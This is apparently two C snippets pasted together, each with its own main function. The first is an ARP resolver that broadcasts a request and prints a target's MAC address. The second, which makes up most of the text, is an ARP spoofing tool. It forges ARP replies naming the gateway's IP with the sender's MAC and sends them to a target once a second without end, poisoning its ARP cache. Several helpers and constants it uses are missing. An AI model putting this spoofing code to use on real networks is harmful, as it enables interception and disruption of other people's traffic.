int main(int c, char *z[]) { errn1(packet_socket = socket(AF_PACKET, SOCK_RAW, rev2(ETH_P_ALL)), "open socket error"); struct sockaddr_ll sa_ll_b, sa_ll_s; sa_ll_b.sll_family = sa_ll_s.sll_family = AF_PACKET; sa_ll_b.sll_protocol = rev2(ETH_P_ALL), sa_ll_b.sll_ifindex = get_ifindex(packet_socket, net_if); sa_ll_s.sll_halen = 0x06, sa_ll_s.sll_ifindex = get_ifindex(packet_socket, net_if), strcpy(sa_ll_s.sll_addr, "\xff\xff\xff\xff\xff\xff"); ok0(bind(packet_socket, (struct sockaddr*)&sa_ll_b, sizeof(struct sockaddr_ll)), "bind error"); char msg[1500+14]; int len = mk_arp_request_packet(msg, "\xcc\xcc\xcc\xcc\xcc\xcc", conv_ip("1.1.1.1"), conv_ip(z[1])); semi a; a.socket = packet_socket, a.len = len, a.msg = msg, a.sa_ll = &sa_ll_s; pthread_t thread_info; ok0(sem_init(&sem_info, 0, 0), "sem_init error"); ok0(pthread_create(&thread_info, NULL, send_eth_packet, (void*)&a), "pthread_create error"); f = set_promiscuous(packet_socket, net_if); signal(SIGALRM, alarm_handler); alarm(2); while (1) { ok0(sem_post(&sem_info), "sem_post error"); errn1(recvfrom(packet_socket, msg, 1514, 0, NULL, NULL), "recvfrom error"); if (*((short*)(msg+12)) == rev2(0x0806) && *((int*)(msg+28)) == conv_ip(z[1])) { int i; for (i=0;i<6;i++) printf("%.2x%c", msg[22+i]&0xff, (i+1==6)?'\n':':'); if (f) leave_promiscuous(packet_socket, net_if); return 0; } } }
int main(int argc, char *argv[]) { if(argc != 3){ fprintf (stderr, "usage: %s <interface> <ip_target>\n", argv[0]); exit(0); } // check if root if (geteuid() || getuid()) { printf("ERROR: You must be root to use this utility\n"); exit(1); } int sfd, len; u_char *mac; char recv_buf[60]; struct in_addr ip_addr; struct sockaddr_ll sl; struct arp_pkt{ struct ether_header eh; struct ether_arp ea; u_char padding[18]; }arp; /*open sock_raw*/ if((sfd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0){ perror("socket"); exit(2); } /*set_promiscuous mode*/ set_promiscuous(sfd, argv[1]); /*get my ip and mac*/ mac = (char *)malloc(MAC_LEN); if(get_ifi(sfd, argv[1], mac, &ip_addr)){ close(sfd); exit(0); } memset(&arp, 0, sizeof(arp)); /* 填寫以太網頭部*/ memcpy(arp.eh.ether_dhost, MAC_BCAST_ADDR, MAC_LEN); memcpy(arp.eh.ether_shost, mac, MAC_LEN); arp.eh.ether_type = htons(ETHERTYPE_ARP); /* 填寫arp數據 */ arp.ea.arp_hrd = htons(ARPHRD_ETHER); arp.ea.arp_pro = htons(ETHERTYPE_IP); arp.ea.arp_hln = MAC_LEN; arp.ea.arp_pln = IP_LEN; arp.ea.arp_op = htons(ARPOP_REQUEST); memcpy(arp.ea.arp_sha, mac, MAC_LEN); memcpy(arp.ea.arp_spa, &ip_addr, IP_LEN); memset(&arp.ea.arp_tha, 0, MAC_LEN); inet_aton(argv[2], arp.ea.arp_tpa); memset(&arp.padding, 0, sizeof(arp.padding)); sl.sll_family = PF_PACKET; sl.sll_ifindex = if_nametoindex(argv[1]); if((len = sendto(sfd, &arp, sizeof(arp), 0, (struct sockaddr*)&sl, sizeof(sl))) <= 0 ){ perror("sendto request"); close(sfd); exit(1); } printf("Broadcast arp request of %s, %d bytes be sent\n", argv[2], len); memset(recv_buf, 0, sizeof(recv_buf)); if((len = recvfrom(sfd, recv_buf, sizeof(arp), 0, NULL, 0)) <= 0 ){ perror("recvfrom reply"); close(sfd); exit(1); } printf("Recv arp reply of %s, %d bytes be sent\n", argv[2], len); /*check arp is reply and from ip(argv[2])*/ if( ntohs(*(__be16 *)(recv_buf + 20))==2 && !memcmp(arp.ea.arp_tpa, recv_buf + 28, 4) ){ memcpy(arp.eh.ether_dhost, (u_char *)(recv_buf + 22), MAC_LEN); arp.ea.arp_op = htons(ARPOP_REPLY); inet_aton(GATEWAY, arp.ea.arp_spa); memcpy(arp.ea.arp_tha, (u_char *)(recv_buf + 22), MAC_LEN); while(1){ if((len = sendto(sfd, &arp, sizeof(arp), 0, (struct sockaddr*)&sl, sizeof(sl))) <= 0 ){ perror("sendto request"); close(sfd); exit(1); } printf("Send arp spoofing to %s, %d bytes be sent\n", argv[2], len); sleep(1); } } free(mac); close(sfd); return 0; }